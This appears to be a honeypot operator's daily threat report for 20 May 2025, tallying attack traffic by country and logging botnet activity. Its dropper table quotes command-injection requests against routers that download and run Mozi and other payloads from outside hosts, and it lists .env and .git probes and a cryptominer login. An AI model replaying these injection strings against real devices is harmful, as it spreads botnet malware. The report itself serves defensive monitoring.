Table of Contents

Daily Report: 2025-05-20
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 24 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1198 requests were recorded during the day, originating from 6 different countries, with a peak of 340 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
BR	Germany
US	Germany
US	Germany
SG	Germany
US	Germany
US	Dubai
PT	Georgia

botnet_dropper_behaviour
#

remote_addr	request
104.236.3.45	GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1
123.129.129.145	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.129.129.145:46263/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
141.98.11.147	GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/payload1.sh+-O-+
103.48.66.213	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.48.66.213:41686/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
141.98.11.128	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1
117.251.167.235	27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
133	2	GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
153	1	GET /symfony/_profiler/.env HTTP/1.1
155	1	GET /sapi/debug/default/.env HTTP/1.1
156	1	GET /frontend/web/debug/default/.env HTTP/1.1
157	1	GET /Admins/.env HTTP/1.1
158	1	GET /Ads/.env HTTP/1.1
159	1	GET /Alpha/.env HTTP/1.1
217	1	\x00\x0E8F\x07^`7\xA5\x8F3\x00\x00\x00\x00\x00
220	1	\x00\x0E8\xBD\xCC\xF2Px0\x9F\xF6\x00\x00\x00\x00\x00
221	1	{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x00ec91cd401c52c518d40061c20fc10b0ec4a67a\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
222	1	{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2246PjJDrYonFdyUfWcXtj9rBhhs8ZBfpdxcEVYoze7sREMK1C6b5fguyRQSUhkwMXaxdpw54CWNTLTMef5wQccwkxC4JEMeo\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
249	1	\x00\x0E8L\x8A8’bR\x12\xC1\x00\x00\x00\x00\x00
278	1	GET /Base/.env HTTP/1.1
279	1	GET /Beta/.env HTTP/1.1
280	1	GET /Blogs/.env HTTP/1.1
298	1	GET /Boot/.env HTTP/1.1
299	1	GET /Bot/.env HTTP/1.1
300	1	GET /Build/.env HTTP/1.1
303	1	GET /DuAb HTTP/1.1
304	1	GET /QzBP HTTP/1.1
342	1	POST /goform/umountUSBPartition HTTP/1.1
411	1	GET /gateway/.git/config HTTP/1.1
412	1	GET /57.129/.git/config HTTP/1.1
413	1	GET /61/.git/config HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	340	US
1	282	BG
2	85	GB
3	81	PL
4	64	NL
5	52	CN
6	47	KR
7	43	PT
8	29	SC
9	25	HK
10	21	CH
11	19	DE
12	13	IN
13	13	AZ
14	11	SE
15	10	IL
16	10	BR
17	8	SG
18	7	LT
19	7	AO
20	6	RO
21	4	BE
22	3	CA
23	2	TH
24	2	MD
25	2	GH
26	2	AR
27	2	VE
28	2	KW
29	1	FR
30	1	ES
31	1	RU
32	1	JP
33	1	LV
34	1	CZ

Report: 2025-05-19

19 May 2025·443 words

Repport Daily

Report: 2025-05-18

18 May 2025·4142 words

Repport Daily

Report: 2025-05-17

17 May 2025·313 words

Repport Daily

	number_of_occurence	country_iso_code
0	340	US
1	282	BG
2	85	GB
3	81	PL
4	64	NL
5	52	CN
6	47	KR
7	43	PT
8	29	SC
9	25	HK
10	21	CH
11	19	DE
12	13	IN
13	13	AZ
14	11	SE
15	10	IL
16	10	BR
17	8	SG
18	7	LT
19	7	AO
20	6	RO
21	4	BE
22	3	CA
23	2	TH
24	2	MD
25	2	GH
26	2	AR
27	2	VE
28	2	KW
29	1	FR
30	1	ES
31	1	RU
32	1	JP
33	1	LV
34	1	CZ

	number_of_occurence	country_iso_code
0	340	US
1	282	BG
2	85	GB
3	81	PL
4	64	NL
5	52	CN
6	47	KR
7	43	PT
8	29	SC
9	25	HK
10	21	CH
11	19	DE
12	13	IN
13	13	AZ
14	11	SE
15	10	IL
16	10	BR
17	8	SG
18	7	LT
19	7	AO
20	6	RO
21	4	BE
22	3	CA
23	2	TH
24	2	MD
25	2	GH
26	2	AR
27	2	VE
28	2	KW
29	1	FR
30	1	ES
31	1	RU
32	1	JP
33	1	LV
34	1	CZ

Daily Report: 2025-05-20#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-05-20
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	340	US
1	282	BG
2	85	GB
3	81	PL
4	64	NL
5	52	CN
6	47	KR
7	43	PT
8	29	SC
9	25	HK
10	21	CH
11	19	DE
12	13	IN
13	13	AZ
14	11	SE
15	10	IL
16	10	BR
17	8	SG
18	7	LT
19	7	AO
20	6	RO
21	4	BE
22	3	CA
23	2	TH
24	2	MD
25	2	GH
26	2	AR
27	2	VE
28	2	KW
29	1	FR
30	1	ES
31	1	RU
32	1	JP
33	1	LV
34	1	CZ